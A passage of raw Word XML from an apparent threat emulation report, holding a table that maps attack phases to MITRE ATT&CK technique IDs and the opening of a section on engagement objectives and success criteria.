              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="263CACD9" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Technique Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00BFD7FA" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>MITRE ATT&amp;CK ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w14:paraId="7A2B96E0" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="115555DC" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11CBA521" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>Active Scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C8A8C0C" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>T1595</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w14:paraId="091404D5" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75480C81" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="681497E3" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>Exploit Public-Facing Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7913D65F" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>T1190</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w14:paraId="734DD264" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="600A1ED7" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F4E1889" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>Command and Scripting Interpreter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72103854" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>T1059</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w14:paraId="3914F388" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B8D4B7B" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>Persistence (Simulated)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4695589E" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>Create Account / Backdoor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A75824F" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>T1136</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w14:paraId="466D2396" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73CF7248" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:lastRenderedPageBreak/>
              <w:t>Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7860381A" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>Exploitation for Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E5538B4" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>T1068</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w14:paraId="74A3873A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63FB154B" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="326CDC5A" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>OS Credential Dumping / Valid Accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="154E3713" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>T1003 / T1078</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w14:paraId="4CAC2D27" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4087A62B" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>Lateral Movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EFEA141" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>Remote Services (SMB)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="797D0816" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>T1021</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w14:paraId="65684509" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="044D0012" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19087048" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>Network Service Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73C84768" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>T1046</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w14:paraId="055573F3" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C2D459B" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FD43542" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>Data from Local System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B0BF8D3" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>T1005</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w14:paraId="29B16FFB" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A4DD4B8" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56E66D76" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>Exfiltration Over C2 / SMB Channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="610220CE" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:t>T1041</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1721AE4D" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="022889B5" w14:textId="6519F4A4" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="87" w:name="_Toc228059722"/>
      <w:bookmarkStart w:id="88" w:name="_Toc228127139"/>
      <w:r>
        <w:t xml:space="preserve">4.4 </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>Objectives and Success Criteria</w:t>
      </w:r>
      <w:bookmarkEnd w:id="87"/>
      <w:bookmarkEnd w:id="88"/>
    </w:p>
    <w:p w14:paraId="68378E0A" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>The threat emulation plan had a clear direction with objectives to have an outcome that was measurable. The engagement was deemed successful when the following were met:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3650F2B2" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>Successful identification of active systems and services within the network</w:t>
      </w:r>
    </w:p>
